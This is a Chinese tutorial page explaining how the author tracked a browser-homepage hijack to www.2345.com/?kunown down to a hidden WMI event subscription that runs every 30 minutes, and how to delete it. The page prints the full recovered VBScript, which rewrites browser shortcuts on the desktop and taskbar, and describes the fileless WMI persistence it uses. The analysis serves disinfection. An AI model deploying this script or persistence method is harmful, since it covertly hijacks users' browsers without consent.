IE,火狐以及其他浏览器主页被劫持到www.2345.com/?kunown的解决办法[图文]

所属分类: 软件教程 / 浏览下载 阅读数: 1121
收藏 0 赞 0 分享

近日在网上相续看到有网友表示自己在下载使用了VeryCD下载链接查看器这款工具以后,再打开浏览器就被直接跳转到 www.2345.com/?kunown 这个导航页面了,而且打开多个浏览器:IE、Chrome、Firefox、Opera、Safari、Maxthon,均相同症状,检查浏览器首页设置——均正常!

最后发现,原来快速启动栏的IE浏览器快捷命令被其修改,修改后的类似如下图,于是认为就是普通的修改快捷方式,手工删除 2345 网址的部分,但半小时后再次被更改了。考虑到可能加载了启动项,在注册表、启动项、服务等中均未查找到相关信息,重启后IE快捷方式被重新篡改。尝试了事件查看器和任务计划,均未在里面查出任何信息。

IE快捷方式的命令被修改为http://www.2345.com/?kunown

之后又安装了超级兔子、360、exterminateit等工具进行检查,也未检出。

打开ProcessMonitor进行监视,发现每隔30分钟出现一个scrcons.exe进程自动启动并修改快速启动栏的命令,然后自动关闭(幸亏是30分钟一次,你要是24小时一次,那我就杯具了……),修改Win7下opera快速启动图标路径类似如下:

C:\Users\iefans\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Opera12.01 1532.lnk

查找资料,发现这应该是一个通过WMI发起的定时自动运行脚本。要查看WMI事件,到以下地址下载WMITool并安装

http://www.microsoft.com/en-us/download/details.aspx?id=24045

安装后打开WMI event viewer,点击左上角register for events,弹出Connect to namespace框,填入“root\subscription”(手工复制粘贴啊,默认出现的不是这个),确定,出现下图:

打开 WMI event viewer 填入 root\subscription

点击左侧_EventFilter:Name="unown_filter",再至右侧右键点击ActiveScriptEventConsume r Name="unown",右键选择view instant properties,如下图:

选择view instant properties

查看ScriptText项可知,这是一段VBScript调用系统服务间隔30分钟执行一次,将所有浏览器调用加上“http://www.2345.com/?kunown”!抓住你了~!隐藏的够深,没常驻进程,没有文件(把自己存储在WMI数据库中)。

受到影响的浏览器有(各色浏览器,差不多齐了):

"IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe"

具体代码如下:

On Error Resume Next:Const link = "http://www.2345.com/?kunown":browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe"):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsers:oDic.Add LCase(browser), browser:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):strDesktop = "C:\Users\Gemini\Desktop":strAllUsersDesktop = WshShell.SpecialFolders("AllUsersDesktop"):QuickLaunch = "C:\Users\Gemini\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch":UserPinnedStartMenu = QuickLaunch & "\User Pinned\StartMenu":UserPinnedTaskBar = QuickLaunch & "\User Pinned\TaskBar":For Each file In fso.GetFolder(strDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:For Each file In fso.GetFolder(strAllUsersDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:If fso.FolderExists(QuickLaunch) Then:For Each file In fso.GetFolder(QuickLaunch).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:If fso.FolderExists(UserPinnedStartMenu) Then:For Each file In fso.GetFolder(UserPinnedStartMenu).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:If fso.FolderExists(UserPinnedTaskBar) Then:For Each file In fso.GetFolder(UserPinnedTaskBar).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If

最后,清除方法:在WMI event viewer中将“_EventFilter:Name="unown_filter"”项目右键删除!

删不掉?

到WMITool安装路径(例如:C:\Program Files (x86)\WMI Tools)下,右键点击wbemeventviewer.exe,选择以管理员身份运行!删之!

还没完,还要手动将快速启动栏中,将各个浏览器快捷命令中的http://www.2345.com/?kunown去掉!

暂时就这么多了,还有没有其它影响的话,用用再看吧!

解决方法来自:Gemini

更多精彩内容其他人还在看

没有BT种子还能否继续下载?

  网上一直上演着一茬又一茬跪求BT种子的凄惨故事。很多朋友对此不屑一顾,他们说,没有种子也可以下载呀。BT下载缺少种子到底还能下载么?喜欢BT下载的朋友一起来看看这其中究竟是怎么回事。   正方观点:没有种子,BT下载任务无法完成,直到新种子出现才能继续下载
收藏 0 赞 0 分享

迅雷抓鸡实现方法与防范技巧

  人世间最大的悲哀,莫过于人家正在害你,不知情的你还对他感恩戴德。这样荒唐的事情,只会在电视剧中出现吗?你想过自己也会变成那样吗?如果你不信,看完本文准让你大吃一惊!   迅雷抓鸡法最阴毒的就是它共享的捆绑文件令受害者无法产生警惕,反而会因为下载速度提
收藏 0 赞 0 分享

Google短信搜索掌握丰富手机资讯

  Google最新推出“短信搜索”功能。用户利用手机向Google发送了一条带有搜索关键字的信息后,Google会判断要查找的特定信息,并自动将所查询的结果以文字形式返回到手机中。不过它与传统的搜索引擎不同,在结果中仅有文字而无具体的链接、网页,这样可方
收藏 0 赞 0 分享

巧用迅雷下载来保存注册码

巧用迅雷的在线保存功能,就可以将自己喜爱的软件的注册码保存在网上,随时使用!这样我们的软件就可以做到永不过期!   实现步骤如下:   第一步:登录雷友   打开迅雷5,单击左侧下方“雷友信息”中的输入框,输入雷友帐号和密码,在打开窗口
收藏 0 赞 0 分享

上网冲浪 七款主流网页浏览器评测

  对于一个网民来说,网页浏览器是不可或缺的软件。面对各式各样的浏览器,我们该如何选择,什么样的浏览器最适合你?我们从用户需求角度出发,对当前流行的7款浏览器进行横向评测,让大家找到适合自己的“冲浪”工具。   测评软件和平台   本次进行测
收藏 0 赞 0 分享

下载、播放不间断 将偷偷看进行到底

  N久没上网下电影看了,被一个GG告知现在流行边看边下,不用再为了下一本片子而等一个通宵,也不会因为没有时间下载片子而没得看。   这样熊掌兼得的好事摆在眼前怎么可能错过呢?于是在百度里一搜,果真看到了不止一家打着边下边看的旗号的BT下载工具。脱兔、ToTolook
收藏 0 赞 0 分享

无需扬鞭自奋蹄 迅雷电骡批量下载方法

  电骡emule作为最为流行的下载方式之一,成为大家的最爱。但是emule有一个最大的问题,就是下载速度太慢,同时这个问题也使得其下载稳定性不够。迅雷的出现很好地解决了这个问题,但是迅雷有一个问题,无法在新建任务时直接输入多个电骡下载资源链接。不过,我们还是有一
收藏 0 赞 0 分享

FlashGet下载文件管理轻松高效的技巧

  在网络上下载资源时,我们最关心的问题就是下载速度,其次是下载后的管理。我们知道,最新版的网际网际快车2.0通过特有的P4S技术为我们提供了高速的下载,不仅如此,它还提供了强大的文件管理功能,方便日后对文件进行打理,提高操作效率。那么,我们要如何最合理地应用
收藏 0 赞 0 分享

IE有效避免恶意网页中恶意代码的攻击

  恶意网页成了宽带的最大威胁之一。以前使涌Modem,因为打开网页的速度慢,在完全打开前关闭恶意网页还有避免中招的可能性。现在宽带的速度这么快,所以很容易就被恶意网页攻击。   一般恶意网页都是因为加入了用编写的恶意代码才有破坏力的。这些恶意代码就相当于一些
收藏 0 赞 0 分享

用命令清除IE7上网浏览历史记录

  无论是出于保证计算机性能还是数据安全方面的考虑,我们常常需要及时清除浏览器的历史记录,包括浏览器缓存、所记录的Cookies、历史记录、密码等。一般而言,在IE7(Internet Explorer 7)中,相应的是操作是通过“Internet 选项”
收藏 0 赞 0 分享
查看更多